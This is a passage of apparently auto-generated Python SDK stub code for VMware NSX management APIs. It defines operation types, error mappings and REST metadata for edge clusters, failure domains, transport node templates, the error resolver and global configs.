'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'ClusterProfile')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ClusterProfileListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'ClusterProfile')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.cluster_profiles',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ComputeCollectionTransportNodeTemplatesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'compute_collection_transport_node_template': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionTransportNodeTemplate'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/compute-collection-transport-node-templates',
request_body_parameter='compute_collection_transport_node_template',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'template_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/compute-collection-transport-node-templates/{template-id}',
path_variables={
'template_id': 'template-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'template_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/compute-collection-transport-node-templates/{template-id}',
path_variables={
'template_id': 'template-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'compute_collection_id': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/compute-collection-transport-node-templates',
path_variables={
},
query_parameters={
'compute_collection_id': 'compute_collection_id',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'template_id': type.StringType(),
'compute_collection_transport_node_template': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionTransportNodeTemplate'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/compute-collection-transport-node-templates/{template-id}',
request_body_parameter='compute_collection_transport_node_template',
path_variables={
'template_id': 'template-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionTransportNodeTemplate'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionTransportNodeTemplate'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeTemplateListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionTransportNodeTemplate'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.compute_collection_transport_node_templates',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _EdgeClustersStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'edge_cluster': type.ReferenceType('com.vmware.nsx.model_client', 'EdgeCluster'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/edge-clusters',
request_body_parameter='edge_cluster',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'edge_cluster_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/edge-clusters/{edge-cluster-id}',
path_variables={
'edge_cluster_id': 'edge-cluster-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'edge_cluster_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/edge-clusters/{edge-cluster-id}',
path_variables={
'edge_cluster_id': 'edge-cluster-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/edge-clusters',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for replacetransportnode operation
replacetransportnode_input_type = type.StructType('operation-input', {
'edge_cluster_id': type.StringType(),
'edge_cluster_member_transport_node': type.ReferenceType('com.vmware.nsx.model_client', 'EdgeClusterMemberTransportNode'),
})
replacetransportnode_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
replacetransportnode_input_value_validator_list = [
]
replacetransportnode_output_validator_list = [
HasFieldsOfValidator()
]
replacetransportnode_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/edge-clusters/{edge-cluster-id}?action=replace_transport_node',
request_body_parameter='edge_cluster_member_transport_node',
path_variables={
'edge_cluster_id': 'edge-cluster-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'edge_cluster_id': type.StringType(),
'edge_cluster': type.ReferenceType('com.vmware.nsx.model_client', 'EdgeCluster'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/edge-clusters/{edge-cluster-id}',
request_body_parameter='edge_cluster',
path_variables={
'edge_cluster_id': 'edge-cluster-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'EdgeCluster'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'EdgeCluster'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'EdgeClusterListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'replacetransportnode': {
'input_type': replacetransportnode_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'EdgeCluster'),
'errors': replacetransportnode_error_dict,
'input_value_validator_list': replacetransportnode_input_value_validator_list,
'output_validator_list': replacetransportnode_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'EdgeCluster'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'replacetransportnode': replacetransportnode_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.edge_clusters',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ErrorResolverStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'error_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/error-resolver/{error_id}',
path_variables={
'error_id': 'error_id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/error-resolver',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for resolveerror operation
resolveerror_input_type = type.StructType('operation-input', {
'error_resolver_metadata_list': type.ReferenceType('com.vmware.nsx.model_client', 'ErrorResolverMetadataList'),
})
resolveerror_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
resolveerror_input_value_validator_list = [
]
resolveerror_output_validator_list = [
]
resolveerror_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/error-resolver?action=resolve_error',
request_body_parameter='error_resolver_metadata_list',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ErrorResolverInfo'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ErrorResolverInfoList'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'resolveerror': {
'input_type': resolveerror_input_type,
'output_type': type.VoidType(),
'errors': resolveerror_error_dict,
'input_value_validator_list': resolveerror_input_value_validator_list,
'output_validator_list': resolveerror_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'list': list_rest_metadata,
'resolveerror': resolveerror_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.error_resolver',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _FailureDomainsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'failure_domain': type.ReferenceType('com.vmware.nsx.model_client', 'FailureDomain'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/failure-domains',
request_body_parameter='failure_domain',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'failure_domain_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/failure-domains/{failure-domain-id}',
path_variables={
'failure_domain_id': 'failure-domain-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'failure_domain_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/failure-domains/{failure-domain-id}',
path_variables={
'failure_domain_id': 'failure-domain-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/failure-domains',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'failure_domain_id': type.StringType(),
'failure_domain': type.ReferenceType('com.vmware.nsx.model_client', 'FailureDomain'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/failure-domains/{failure-domain-id}',
request_body_parameter='failure_domain',
path_variables={
'failure_domain_id': 'failure-domain-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'FailureDomain'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'FailureDomain'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'FailureDomainListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'FailureDomain'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.failure_domains',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _GlobalConfigsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'config_type': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/global-configs/{config-type}',
path_variables={
'config_type': 'config-type',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/global-configs',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for resyncconfig operation
resyncconfig_input_type = type.StructType('operation-input', {
'config_type': type.StringType(),
'global_configs': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'GlobalConfigs')]),
})
resyncconfig_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
